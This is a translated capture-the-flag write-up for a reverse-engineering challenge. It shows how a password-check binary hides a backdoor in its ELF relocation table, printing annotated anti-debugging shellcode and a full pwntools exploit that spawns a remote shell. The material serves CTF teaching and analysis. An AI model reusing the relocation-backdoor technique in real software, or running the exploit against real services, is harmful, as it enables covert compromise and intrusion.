(LLM-translated with proof-read done)
Reverse; 400 points; 1 solve
Link to challenge: https://o.riat.re/lyla-a77c6d95f414453b4f170346cc902eb9e7fd33ddc10b471b95c21239e1b47852.tar.gz
Faced with such a traditional reverse engineering challenge, with a small amount of code and the classic design of exchanging a password for a flag, what are you waiting for? Come and solve it!
Note: The problem guarantees a solution exists, but the solution is not unique.
nc <ip> 1337
(Participants who worked on this challenge during the competition can skip this section)
After decompressing the attachment, you get these files:
$ tree .
.
├── docker-compose.yaml
├── Dockerfile
├── flag.txt
└── lyla
1 directory, 4 files
$ file lyla
lyla: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=a6e1303a40f0bf951b5e3f63be8e137237efe315, for GNU/Linux 3.2.0, stripped
Here, lyla is the program to be analyzed, and the other three files are deployment files used to reproduce the challenge's running environment.
Using IDA Pro + Hex-Rays to analyze lyla, we can easily figure out the main logic of the program. The source code is posted directly here, so we won't elaborate further:
Click to expand code
char g_password[256];
// sub_2800
std::ifstream OpenFlag() {
  if (!std::filesystem::exists("flag.txt")) {
    std::cerr
        << "Flag file not found in current directory, challenge is broken."
        << std::endl;
    abort();
  }
  if (std::filesystem::file_size("flag.txt") < 2) {
    std::cerr << "Flag file is empty, challenge is broken." << std::endl;
    abort();
  }
  std::ifstream file{"flag.txt"};
  if (!file) {
    std::cerr << "Failed to open flag file, challenge is broken." << std::endl;
    abort();
  }
  return file;
}
// sub_2680
void AlarmHandler(int) {
  puts("Timed out.");
  exit(0);
}
// sub_2710
bool Verify(std::string_view flag) {
  if (!flag.starts_with("password{") || !flag.ends_with("}")) {
    return false;
  }
  auto key = flag.substr(9, flag.length() - 10);
  if (key.size() != 16) {
    return false;
  }
  unsigned char output[32];
  uint64_t rawkey[2];
  memcpy(rawkey, key.data(), sizeof(rawkey));
  Encrypt(output, kInput, sizeof(output), rawkey); // sub_2F70
  return !memcmp(output, kExpected, sizeof(kExpected));
}
int main(int argc, char *argv[]) {
  setvbuf(stdin, nullptr, _IONBF, 0);
  setvbuf(stdout, nullptr, _IONBF, 0);
  setvbuf(stderr, nullptr, _IONBF, 0);
  std::ios::sync_with_stdio(false);
  std::ifstream flag_file = OpenFlag();
  signal(SIGALRM, AlarmHandler);
  alarm(60);
  std::cout << "Welcome to Lyla, the devious flag vending machine." << '\n';
  std::cout << "Input password: ";
  std::cout.flush();
  std::cin.getline(g_password, sizeof(g_password));
  if (Verify(g_password)) {
    std::cout << "Correct password! Congratulations, here is the flag:" << '\n';
    std::cout << flag_file.rdbuf();
    std::cout.flush();
  } else {
    std::cout << "Nope." << std::endl;
  }
  return 0;
}The .rdbuf() part might not be immediately obvious, but contestants should easily guess that it outputs the content of flag.txt to standard output if the password is correct. Clearly, the focus is on the encryption function sub_2F70 within the verification function sub_2710.
(Participants who worked on this challenge during the competition can skip this section)
At the beginning of this function, our input "password" is used to generate 32 items that look like subkeys. The logic here seems to be loop-unrolled and looks very ugly:
Click to expand ugly code
unsigned __int64 __fastcall sub_2F70(__int64 *a1, __int64 *a2, unsigned __int64 a3, __int64 *a4)
{
    /* ... */
    v87 = __readfsqword(0x28u);
    v4 = a3 & 0xF;
    if ( (a3 & 0xF) != 0 )
        __assert_fail("size % 16 == 0", "<redacted>", 0x34u, "<redacted>");
    v6 = *a4 + __ROR8__(a4[1], 8);
    v83[0] = *a4;
    v7 = v6 ^ __ROR8__(v83[0], 61);
    v8 = (v7 + __ROR8__(v6, 8)) ^ 1;
    v83[1] = v7;
    v9 = v8 ^ __ROR8__(v7, 61);
    v10 = (v9 + __ROR8__(v8, 8)) ^ 2;
    v83[2] = v9;
    v11 = v10 ^ __ROR8__(v9, 61);
    v12 = (v11 + __ROR8__(v10, 8)) ^ 3;
    v83[3] = v11;
    /* Omitted, repeated 32 times in total */It's not hard to find the pattern. Let's rewrite it more cleanly:
unsigned __int64 __fastcall sub_2F70(__int64 *a1, __int64 *a2, unsigned __int64 a3, __int64 *a4)
{
    uint64_t key[32];
    uint64_t A = a4[0], B = a4[1];
    for (int i = 0; i < 32; i++) {
        B = (__ROR8__(B, 8) + A) ^ i;
        key[i] = A;
        A = B ^ __ROR8__(A, 61);
    }Similarly, the encryption loop below is also unrolled (though with fewer iterations):
Click to expand ugly code
    do
    {
      v65 = *a2;
      v66 = a2[1];
      v67 = v83;
      do
      {
        v68 = *v67 ^ (v65 + __ROR8__(v66, 8));
        v69 = v68 ^ __ROR8__(v65, 61);
        v70 = v67[1] ^ (v69 + __ROR8__(v68, 8));
        v71 = v70 ^ __ROR8__(v69, 61);
        v72 = v67[2] ^ (v71 + __ROR8__(v70, 8));
        v73 = v72 ^ __ROR8__(v71, 61);
        v74 = v67[3] ^ (v73 + __ROR8__(v72, 8));
        v75 = v74 ^ __ROR8__(v73, 61);
        v76 = v67[4] ^ (v75 + __ROR8__(v74, 8));
        v77 = v76 ^ __ROR8__(v75, 61);
        v78 = v67[5] ^ (v77 + __ROR8__(v76, 8));
        v79 = v78 ^ __ROR8__(v77, 61);
        v80 = v67[6] ^ (v79 + __ROR8__(v78, 8));
        v81 = v80 ^ __ROR8__(v79, 61);
        v66 = v67[7] ^ (v81 + __ROR8__(v80, 8));
        v67 += 8;
        v65 = v66 ^ __ROR8__(v81, 61);
      }
      while ( &v86 != (char *)v67 );
      v4 += 16LL;
      *a1 = v65;
      a1[1] = v66;
    }
    while ( v4 < a3 );It's not hard to see that it's actually:
    for (int v4 = 0; v4 < a3; v4 += 16) {
        uint64_t v65 = a2[0], v66 = a2[1];
        for (int i = 0; i < 32; i++) {
            v66 = (__ROR8__(v66, 8) + v65) ^ key[i];
            v65 = v66 ^ __ROR8__(v65, 61);
        }
        a1[0] = v65;
        a1[1] = v66;
    }At this point, we can conclude: this is a block cipher with a 16-byte block size and a 16-byte key length. It performs 32 rounds of operations consisting purely of addition, circular shifts, and XOR. Its Key Schedule process and encryption process are isomorphic. The only problem is, unlike typical reverse engineering challenges where the key is fixed and you need to find an input for a given output, here the input and output are fixed, and we need to find a key that makes it work.
Furthermore, we can notice that regardless of the input length, the encryption function only processes its first 16 bytes. In the main logic, we saw that the input provided to the encryption function is 32 bytes, and the comparison also checks the full 32-byte result. However, the latter 16 bytes are not processed here. Therefore, the condition in the main logic seems impossible to satisfy???
Let's re-examine this cipher. Notice it's an ARX structure. After some searching, we can find a cipher called Speck whose implementation matches this one exactly. The problem is... this cipher algorithm seems to be secure, doesn't it? This means we can't recover the key from just two input/output pairs. Combined with the bug mentioned above, we can be confident: this challenge is unsolvable.
But the problem description specifically states there is a solution. What's going on? Were we deceived by IDA? Is there more hidden logic in the program?
Assuming there is hidden logic in this program, where would it be hidden? Apart from the obvious code, where else could logic controlling this program be concealed? Readers are encouraged to pause here and try to explore on their own. Let's first rule out some incorrect answers:
- Meticulously examining every function and every byte of the program in a disassembler. This won't reveal anything.
- There's nothing special in init_array,fini_array,.init, or.fini.
Next, if you still have no ideas, here are two clues. We again encourage readers to explore on their own after reading each clue before proceeding to the spoilers:
Clue 1
Open the program in a hex editor. You can see that after the normal code at the end of the .text section, unlike other programs, it's not all zeros. After a stretch of 00s, there's a segment of high-entropy data. What is it for? When would it be used?
Clue 2
$ readelf -a lyla
# ...
Dynamic section at offset 0x4c88 contains 29 entries:
# ...
 0x000000000000001e (FLAGS)              TEXTREL BIND_NOW
 0x000000006ffffffb (FLAGS_1)            Flags: NOW PIE
 0x000000006ffffffe (VERNEED)            0x1048
 0x000000006fffffff (VERNEEDNUM)         3
 0x000000006ffffff0 (VERSYM)             0xfd4
 0x000000006ffffff9 (RELACOUNT)          8
 0x0000000000000000 (NULL)               0x0
Relocation section '.rela.dyn' at offset 0x1118 contains 26 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
0000000008e4  000000000008 R_X86_64_RELATIVE                    2600
0000000008e6  000000000008 R_X86_64_RELATIVE                    25f1
0000000008e7  000000000008 R_X86_64_RELATIVE                    25ff
0000000008e8  000000000008 R_X86_64_RELATIVE                    1db0
000000005be0  000000000008 R_X86_64_RELATIVE                    2670
000000005be8  000000000008 R_X86_64_RELATIVE                    2560
000000005bf0  000000000008 R_X86_64_RELATIVE                    2630
000000006008  000000000008 R_X86_64_RELATIVE                    6008
000000005fd0  002c00000006 R_X86_64_GLOB_DAT 0000000000000000 __cxa_finalize@GLIBC_2.2.5 + 0
000000005fd8  000f00000006 R_X86_64_GLOB_DAT 0000000000000000 __libc_start_main@GLIBC_2.34 + 0
# ...
Hint 1
What is the purpose of TEXTREL? It sounds like it's used to relocate the .text section, but doesn't PIE (Position Independent Executable) mean code doesn't need relocation? Why would it appear in combination with PIE?Hint 2
R_X86_64_RELATIVE entries in the RELA relocation table write 8 bytes to the target offset. Why do the first four entries look like their destination addresses overlap? Where are they writing, and what are they writing?Hint 3
These four entries overwrite the type and value of _ZNKSt5ctypeIcE8do_widenEc in the ELF symbol table. Where is this symbol used?
Another reminder: the challenge is designed so that once a contestant finds the entry point, it should be easy to follow the trail and solve it. If you are interested in trying to explore it yourself, please stop reading here.
Spoiler Alert
The decoding and triggering logic for the backdoor code is hidden in the relocation table. The structure of the relocation table will not be detailed here; interested students can refer to the glibc source code in glibc/sysdeps/x86_64/dl-machine.h.
The loading phase utilizes the following two relocation types:
- R_X86_64_COPY- Let- symbol_valuebe the resolved address of the specified symbol. The actual effect is- memcpy(elf_base+addr, symbol_value, symbol_size);
- R_X86_64_RELATIVE-- *(uint64_t*)(elf_base+addr) = (elf_base+addend);
To make the relocation table containing the backdoor less conspicuous, we chose not to directly insert the backdoor-triggering relocation entries into the original relocation table. Instead, we exploited the fact that RELA and JMPREL are contiguous in memory. We modified DT_RELASZ to DT_RELASZ + DT_PLTRELSZ - 1 [1], causing the content of the .rela.plt section to be parsed twice. We also added five entries to .rela.dyn as the first stage. Four of these R_X86_64_RELATIVE entries set the type of the ELF symbol _ZNKSt5ctypeIcE8do_widenEc to an absolute symbol, and then overwrote its value to be the address of the metadata for the symbol _ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE10_M_disposeEv.
Next, when an R_X86_64_COPY relocation referencing this symbol is processed, it uses a small piece of data located at offset 0x1DB0 (at the end of the first ELF Segment) to overwrite the metadata of the ..._disposeEv symbol in the symbol table.
The overwritten metadata sets the type to LOCAL, the value to 0x1A50, and the size to 0x348. This location (0x1A50) stores the relocation entries that actually implement the backdoor injection. Subsequent R_X86_64_COPY relocations that trigger this symbol will copy the backdoor relocation entries from 0x1A50 into the .rela.plt section. ld.so, when subsequently processing JMPREL, will then execute our backdoor-triggering relocation entries.
The two symbols borrowed here would not normally have corresponding R_X86_64_COPY entries, but presumably, no one would notice this, right? ;)
A two-stage loading process was used here, with two considerations in mind:
- Avoid crashes if the binary is stripped or loaded by WSL.
- In both of these scenarios, the data at the end of the segment would be zeroed out. Without the second stage, we would overwrite the relocation table with all zeros, causing the program to crash.
- With the second stage, if the data at the end of the segment is zeroed, the size of the second COPYbecomes 0. The backdoor is effectively removed, but the program doesn't crash and arouse suspicion.
 
- Minimize suspicious-looking data in the visible RELA table and symbol table.
- With this approach, the RELA table only has four additional R_X86_64_RELATIVErelocations (which are common in the program) and twoR_X86_64_COPYrelocations on seemingly unrelated symbols.
- Unless one carefully inspects their target offsets, it's hard to realize they are problematic.
 
- With this approach, the RELA table only has four additional 
[1] The reason for subtracting one is that ld.so specifically checks for cases where JMPREL is entirely part of RELA, and in such cases, it skips the second execution.
The backdoor utilizes the following relocation types:
- R_X86_64_SIZE64- If symbol index = 0, the actual effect of this relocation entry is- *(uint64_t*)(elf_base+addr) = (addend+0);
- R_X86_64_COPY- Let- symbol_valuebe the resolved address of the specified symbol. The actual effect is- memcpy(elf_base+addr, symbol_value, symbol_size);
- R_X86_64_RELATIVE-- *(uint64_t*)(elf_base+addr) = (elf_base+addend);
- R_X86_64_64- Let- symbol_valuebe the resolved address of the specified symbol. The actual effect is- *(uint64_t*)(elf_base+addr) = (symbol_value + addend);
Additionally, we leverage the IFUNC mechanism. By setting the symbol type to STT_GNU_IFUNC, when ld.so resolves this symbol, it treats the originally resolved value as a function pointer, calls it, and uses the function's return value as the resolved symbol value. This can be used to trigger shellcode execution.
Patching the ELF's section table and .dynamic, and modifying JMPREL to 0x1A50, we can list the relocation entries we added as follows:
Relocation section '.rela.plt' at offset 0x1a50 contains 36 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
0000000008f0  000000000021 R_X86_64_SIZE64                      8
0000000008e8  000000000008 R_X86_64_RELATIVE                    5d70
0000000008e8  003400000005 R_X86_64_COPY     0000000000002bb0 _ZNKSt5ctypeIcE8d[...] + 0
0000000008e8  003400000001 R_X86_64_64       0000000000002bb0 _ZNKSt5ctypeIcE8d[...] + 8
0000000008e8  003400000005 R_X86_64_COPY     0000000000002bb0 _ZNKSt5ctypeIcE8d[...] + 0
0000000039a5  003400000001 R_X86_64_64       0000000000002bb0 _ZNKSt5ctypeIcE8d[...] + a8
0000000008e8  000000000021 R_X86_64_SIZE64                      16493f2103392e07
00000000394d  003400000001 R_X86_64_64       0000000000002bb0 _ZNKSt5ctypeIcE8d[...] + 4599d06a45025d41
000000003975  003400000001 R_X86_64_64       0000000000002bb0 _ZNKSt5ctypeIcE8d[...] + 3db6c010e3b20b6d
000000000760  000000000021 R_X86_64_SIZE64                      1200005be0
0000000039ad  003400000001 R_X86_64_64       0000000000002bb0 _ZNKSt5ctypeIcE8d[...] + 432d2b3e4fe15b46
000000000798  000000000008 R_X86_64_RELATIVE                    3945
000000006508  003400000001 R_X86_64_64       0000000000002bb0 _ZNKSt5ctypeIcE8d[...] + 601e33405c333658
00000000395d  003400000001 R_X86_64_64       0000000000002bb0 _ZNKSt5ctypeIcE8d[...] - 3299f71177f07ebf
000000003995  003400000001 R_X86_64_64       0000000000002bb0 _ZNKSt5ctypeIcE8d[...] + 5e45c510bcf87d70
00000000398d  003400000001 R_X86_64_64       0000000000002bb0 _ZNKSt5ctypeIcE8d[...] - 55de21ab84bda0bf
000000003955  003400000001 R_X86_64_64       0000000000002bb0 _ZNKSt5ctypeIcE8d[...] - 23890dca8e09f487
000000003985  000000000008 R_X86_64_RELATIVE                    1a40
000000003965  003400000001 R_X86_64_64       0000000000002bb0 _ZNKSt5ctypeIcE8d[...] + 1157fea7cdc85d0c
00000000399d  003400000001 R_X86_64_64       0000000000002bb0 _ZNKSt5ctypeIcE8d[...] - 5bff483e74352af5
0000000039b5  003400000001 R_X86_64_64       0000000000002bb0 _ZNKSt5ctypeIcE8d[...] - 16487b760fdd6dd6
000000003945  003400000001 R_X86_64_64       0000000000002bb0 _ZNKSt5ctypeIcE8d[...] - 16493f30e5abe5b4
00000000396d  003400000001 R_X86_64_64       0000000000002bb0 _ZNKSt5ctypeIcE8d[...] - 742301bac3c48361
00000000397d  003400000001 R_X86_64_64       0000000000002bb0 _ZNKSt5ctypeIcE8d[...] - 5affe5a498f9850f
000000000790  000000000021 R_X86_64_SIZE64                      -efff600000000
000000000770  003400000001 R_X86_64_64       0000000000002bb0 _ZNKSt5ctypeIcE8d[...] - 16493f2103392dff
00000000393d  002400000005 R_X86_64_COPY     0000000000000000 _ITM_deregisterTM[...] + 0
000000006508  000f00000001 R_X86_64_64       0000000000000000 __libc_start_main@GLIBC_2.34 + 0
000000006508  003400000001 R_X86_64_64       0000000000002bb0 _ZNKSt5ctypeIcE8d[...] - 16493f209dcbc493
000000003935  002400000001 R_X86_64_64       0000000000000000 _ITM_deregisterTM[...] + 0
0000000039b3  002600000001 R_X86_64_64       0000000000000000 __gmon_start__ + 0
000000003935  000000000021 R_X86_64_SIZE64                      0
0000000008e8  000000000008 R_X86_64_RELATIVE                    16e8
0000000008f0  000000000021 R_X86_64_SIZE64                      360
000000001388  003400000005 R_X86_64_COPY     0000000000002bb0 _ZNKSt5ctypeIcE8d[...] + 0
000000000000  000000000000 R_X86_64_NONE                        0
Reading through this, we can outline its logic as follows:
- Get the DT_DEBUGpointer from the ELF's.dynamicsection. This pointer points to an_r_debugstructure, which contains a pointer to alink_mapstructure. Thelink_mapstructure includes the ELF's base address, size, symbol table, and the values of all dynamic tags.
- Calculate the address link_map + 64 + 13 * 8and save it at the end of the.textsection for later use. Here, 13 is the value ofDT_FINI. This address islink_map->l_info[DT_FINI](Note: actual structure member isl_info, notdl_info), which controls the address of thefinifunction called byld.sowhen the program exits.
- Resolve the values of the _dl_argvvariable and thetimefunction for later use.
- Write a piece of shellcode at the end of the .textsection and execute it using the IFUNC mechanism.
Symbol resolution is achieved by modifying the symbol table and then triggering an R_X86_64_64 relocation. Memory reading is done via R_X86_64_COPY. Constants are not written in plaintext but are formed by an addition operation using R_X86_64_64.
Finally, the backdoor relocation entries use R_X86_64_COPY to copy back the backed-up original content of .rela.plt. This way, when JMPREL is processed for the second time, the original JMPREL entries can be handled normally.
Since the ELF Relocation Machine cannot write to absolute addresses (it can only write relative to the ELF being loaded), shellcode is needed to accomplish writing to absolute addresses. The shellcode also performs anti-debugging tasks.
The annotated shellcode content is as follows:
_begin:
    push rbx
    lea rbx, [rip+_begin-8]
    mov rdi, [rbx] /* &_dl_argv */
    // Make sure argv[0] starts with '/' (which is unusual when debugging, but plausible with xinetd)
    mov rcx, [rdi]
    jrcxz bye
    cmp byte ptr [rcx], '/'
    jnz bye
    /* Optimized (for size) loop for skipping argv */
    /* No need to populate rcx: it is guaranteed to have a pointer now */
    xor eax, eax
    repnz scasq
    // Check for environment variable "COLUMNS" and "LD_*".
    // To make it tight we use an approximation: just check the first 4 characters.
env_check_loop:
    mov rcx, [rdi]
    scasq
    jrcxz env_check_okay
    mov eax, dword ptr [rcx]
    ror eax, 1
    cmp eax, 0xaaa627a1 /* "COLU" */
    jz bye
    // hex(ror(u32(b"LD_P"), 1, 32) & 0xffff). there might be false positive but
    // we don't care as long as there aren't in prod.
    cmp ax, 0xa226
    jz bye
    jmp env_check_loop
env_check_okay:
    /* Patch payload to only run at correct time. rdi points to auxv (writable) */
    xor edi, edi
    call [rbx-8] /* This calls time() which was stored at [rbx-8] */
    /* Decode payload only when time() % 64 == 0 */
    test al, 63
    movqq rcx, PAYLOAD_SIZE_IN_WORDS /* This should be a constant representing size */
    movabs r11, VALUE_TO_WRITE /* This should be a constant address */
    lea rdi, [rbx+(_end-_begin)+8] /* Start of encoded payload */
    jnz bye
    imul eax, eax, 119 /* time() * 119 */
    stosd /* Store this value at the beginning of the decoded payload */
    // Decode payload
    xor eax, eax
decode_loop:
    xor [rdi+rcx*4], eax /* Xor with 0, effectively doing nothing the first time or if eax is 0 */
    jz bye /* If the value at [rdi+rcx*4] becomes 0 after XOR, exit. (This means original was 0 or eax made it 0) */
    add eax, [rdi+rcx*4] /* Accumulate the decoded value */
    loop decode_loop
    // Overwrite l_info[DT_FINI] in link_map
    movabs r10, ADDR_TO_WRITE /* Address of l_info[DT_FINI] stored earlier */
    mov [r10], r11 /* r11 was set to the address of the second shellcode (_end + 8) */
bye:
    // Zeroing self
    movqq rdi, rbx
    movqq rcx, _fin-_begin+8
    xor eax, eax
    pop rbx
    rep stosb
_fin:
    ret
_end:The anti-debugging tricks employed here are:
- Check if argv[0]starts with'/'.
- Check if the environment variables include COLUMNS(gdb sets this).
- Check if the environment variables include LD_*.
- Check if the return value of time()modulo 64 is 0 (i.e., the backdoor triggers every 64 seconds).
If all checks pass, it overwrites the value of link_map->l_info[DT_FINI] to the address at the end of this shellcode, decodes its content, multiplies time() by 119 and saves it at a specified offset, and finally, zeros out its own content. By controlling the layout of content in the file, we've placed another encoded shellcode at the end of this shellcode, so it will be executed when the program exits.
The other shellcode is the actual backdoor code. It first resolves clock_gettime from vDSO. It checks if the return value of clock_gettime(CLOCK_REALTIME, ...) and the program's start time differ by exactly 3 seconds, and if the byte at an offset of 255 from the program's input password buffer is non-zero. If both conditions are met, it runs Speck (128/128) on 16 bytes at an offset of 128 from the program's input password, using a hardcoded key, and checks if the result matches another hardcoded value. If these conditions are satisfied, it sets the password buffer to be executable using mprotect and then runs it.
After reverse engineering the backdoor's logic, obtaining the flag is relatively simple. We just need to use Speck (128/128) to decrypt the data required to trigger the backdoor, concatenate it with a /bin/sh shellcode in the format described above, connect to the remote server at a time that satisfies the conditions, and send it after three seconds to get a shell. Once a shell is obtained, simply cat flag.txt. If a contestant's environment doesn't allow synchronization with the server's time, they can also start a new connection every second until successful, which should solve it within at most 70 seconds.
from pwn import *
context.arch = 'amd64'
ACTUAL_KEY = [0x85615CE70BA97239, 0xAF6F5627BC993A1E]
class Speck:
  KEY_SIZE = 16
  BLOCK_SIZE = 16
  ROUNDS = 32
  def __init__(self, key: bytes):
    self.subkeys = self.key_schedule(key)
  @staticmethod
  def forward(x, y, k):
    x = ror(x, 8, 64)
    x = (x + y) % 2**64
    x ^= k
    y = rol(y, 3, 64)
    y ^= x
    return x, y
  
  @staticmethod
  def backward(x, y, k):
    y ^= x
    y = ror(y, 3, 64)
    x ^= k
    x = (x - y) % 2**64
    x = rol(x, 8, 64)
    return x, y
  def key_schedule(self, key: bytes):
    assert len(key) == self.KEY_SIZE
    A, B = (u64(key[:8]), u64(key[8:]))
    result = []
    for i in range(self.ROUNDS):
      result.append(A)
      B, A = self.forward(B, A, i)
    return result
  def encrypt_block(self, block: bytes):
    assert len(block) == self.BLOCK_SIZE
    x, y = (u64(block[:8]), u64(block[8:]))
    for i in range(self.ROUNDS):
      y, x = self.forward(y, x, self.subkeys[i])
    return p64(x) + p64(y)
  def decrypt_block(self, block: bytes):
    assert len(block) == self.BLOCK_SIZE
    x, y = (u64(block[:8]), u64(block[8:]))
    for i in range(self.ROUNDS - 1, -1, -1):
      y, x = self.backward(y, x, self.subkeys[i])
    return p64(x) + p64(y)
def sanity():
  speck = Speck(b"\x00" * 16)
  assert speck.decrypt_block(speck.encrypt_block(b"\x00"*16)) == b"\x00"*16
  speck = Speck(bytes(range(16)))
  assert speck.encrypt_block(b" made it equival") == bytes([0x18, 0x0d, 0x57, 0x5c, 0xdf, 0xfe, 0x60, 0x78, 0x65, 0x32, 0x78, 0x79, 0x51, 0x98, 0x5d, 0xa6])
sanity()
if args.WRONG_KEY:
  ACTUAL_KEY[0] = 114514 # A common placeholder number in Chinese internet culture
cipher = Speck(p64(ACTUAL_KEY[0]) + p64(ACTUAL_KEY[1]))
payload = flat({
  0: asm(shellcraft.sh()),
  128: cipher.decrypt_block(b"\x00"*16),
  255: b"\x01" # Ensure non-zero byte at offset 255
}, length=256) # Ensure payload length is 256
assert b"\n" not in payload[:255] # The part getline reads
if args.MISALIGN:
  while int(time.time())%64 == 0:
    time.sleep(0.1)
else:
  log.info("Waiting for backdoor trigger interval...")
  while int(time.time())%64 != 0:
    time.sleep(0.5)
if args.REMOTE:
  r = remote(args.HOST, args.PORT)
else:
  r = process(args.EXE or os.path.realpath("./lyla"))
r.recvuntil(b"Input password: ")
time.sleep(int(args.DELAY or 3))
r.sendline(payload)
r.interactive()